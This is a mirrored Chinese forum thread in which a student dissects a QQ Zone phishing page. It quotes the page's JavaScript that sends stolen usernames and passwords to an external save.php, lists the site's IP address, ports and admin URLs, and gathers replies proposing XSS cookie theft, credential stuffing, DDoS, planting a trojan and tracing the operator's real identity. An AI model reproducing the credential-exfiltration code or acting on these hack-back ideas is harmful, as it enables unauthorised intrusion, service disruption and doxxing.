返回信息流起因来自同学发的一个二维码:
以前还能用电脑打开,现在就只能用手机端打开了。
http://yoyo8.com/wap/p.html
页面做的还挺精致
里边有个代码是
if (!err){
$.ajax({
url:'http://uhyu.xyz/save.php?hrUW3PG7mp3RLd3dJu='+u+'&LxMzAX2jog9Bpjs07jP='+p,
type:'GET',
dataType:'jsonp',
success:function(r){
window.location.href = 'http://img1.ph.126.net/NuXugCfmFA1YXGZ8b6OkKw==/6597345744077813248.jpg';
巴拉巴拉
感觉应该是把账号和密码提交到http://uhyu.xyz/save.php?hrUW3PG7mp3RLd3dJu='+u+'&LxMzAX2jog9Bpjs07jP='+p这个地方了。 },
搜了下只能获取这个信息,
然后扫描开放的端口,有21,22,80,888,8888
然后能够找到的几个页面是
ip:103.224.82.177
说明:http://uhyu.xyz/install/index.php
后台 :http://uhyu.xyz/admins/login.php
http://uhyu.xyz:8888/login
其他就没啥思路了,有大佬知道接下来怎么做吗?旁注还是用找ftp弱口令?没有系统学过,不知道怎么处理这种网站,还是直接去举报他们啊。
这是一条镜像帖。来源:北邮人论坛 / security / #43690同步于 2018/9/17
该镜像源已超过 30 天没有更新,可能在源站已被删除。
Security机器人发帖
【问题】关于一个QQ空间钓鱼网站,如何攻破
dhown
2018/9/17镜像同步22 回复
订阅后,新回复会通过你的通知中心匿名送达。
9 条回复
请问直接用alert(1)那个吗?特殊字符都被转义了,要么被阻止了╯﹏╰
【 在 YAIBA 的大作中提到: 】
: 这种一般都是先从登录框插xss 看能不能获取到cookie进后台
应该是被盗号了,这个网站比以前的盗号网站精致多了,贼像。
完全没思路,能想到的就是撸个脚本污染下他的数据库,估计作用不大,希望能攻破后台,挂个马啥的,可惜不会233333
要不我就去举报这个域名了
【 在 yo1995 的大作中提到: 】
: 同学被盗号了吧
: 如果没有验证码试试常用用户名撞库?
: 单纯想调戏一下的话可以写个脚本撸他流量或者DDoS,有QQ号也可以反向钓鱼
: ...................
手机号要是是真的的话…踢翻他的功德箱好像微信和支付宝都是实名的…
【 在 dhown 的大作中提到: 】
: 应该是被盗号了,这个网站比以前的盗号网站精致多了,贼像。
: 完全没思路,能想到的就是撸个脚本污染下他的数据库,估计作用不大,希望能攻破后台,挂个马啥的,可惜不会233333
: 要不我就去举报这个域名了
就是不太清楚这个网站就是他的,还是被人挂上的页面,手机号绑定的支付宝都是和注册人的名字一致。
成都西维这个公司好像还被人告了好几次,哈哈哈,不清楚
【 在 yo1995 的大作中提到: 】
: 手机号要是是真的的话…踢翻他的功德箱好像微信和支付宝都是实名的…